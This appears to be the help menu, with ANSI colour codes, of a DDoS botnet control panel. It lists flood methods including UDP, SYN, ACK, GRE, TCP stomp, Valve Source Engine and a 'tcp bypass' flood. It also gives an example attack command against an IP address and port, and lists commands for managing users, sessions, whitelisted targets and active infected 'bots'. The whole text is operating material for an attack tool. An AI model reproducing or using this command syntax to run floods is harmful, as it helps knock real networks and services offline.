\x1b[94mFlood examples\x1b[93m:\x1b[0m
  \x1b[0m- \x1b[0m!(attack) <target> <duration> [options]
  \x1b[0m- \x1b[0m!udpplain 70.70.72.72 30 dport=80 len=1300
  
\x1b[94mFloods\x1b[93m:\x1b[0m
  \x1b[0m- \x1b[94mudp\x1b[93m: \x1b[0mudp flood
  \x1b[0m- \x1b[94mudpplain\x1b[93m: \x1b[0mudp flood with less options
  \x1b[0m- \x1b[94mvse\x1b[93m: \x1b[0mvalve source engine specific flood
  \x1b[0m- \x1b[94mstd\x1b[93m: \x1b[0mstd socket flood
		
  \x1b[0m- \x1b[94mgreip\x1b[93m: \x1b[0mgre ip flood
  \x1b[0m- \x1b[94mgreeth\x1b[93m: \x1b[0mgre ethernet flood
	
  \x1b[0m- \x1b[94msocket\x1b[93m: \x1b[0mtcp socket flood
  \x1b[0m- \x1b[94msyn\x1b[93m: \x1b[0mbasic syn flood
  \x1b[0m- \x1b[94mack\x1b[93m: \x1b[0mbasic ack flood
  \x1b[0m- \x1b[94mstomp\x1b[93m: \x1b[0mtcp stomp flood
  \x1b[0m- \x1b[94mtcplegit\x1b[93m: \x1b[0mtcp bypass flood
\x1b[94mCommands\x1b[93m:\x1b[0m
  \x1b[0m- \x1b[94mhelp\x1b[93m: \x1b[0mdisplay this menu (?, herp, methods) [n/a]
  \x1b[0m- \x1b[94mclear\x1b[93m: \x1b[0mreturn to the home screen (c, cls) [n/a]
\x1b[0m
  \x1b[0m- \x1b[94musers\x1b[93m: \x1b[0mmanage users (n/a) [edit, list, add]
  \x1b[0m- \x1b[94msessions\x1b[93m: \x1b[0mview active sessions (admin) [n/a]
  \x1b[0m- \x1b[94mwhitelist\x1b[93m: \x1b[0madd targets to the whitelist (n/a) [n/a]
  \x1b[0m- \x1b[94mbots\x1b[93m: \x1b[0mview a list of active devices (n/a) [n/a]
  \x1b[0m- \x1b[94mfloods\x1b[93m: \x1b[0menable or disable floods (attacks)
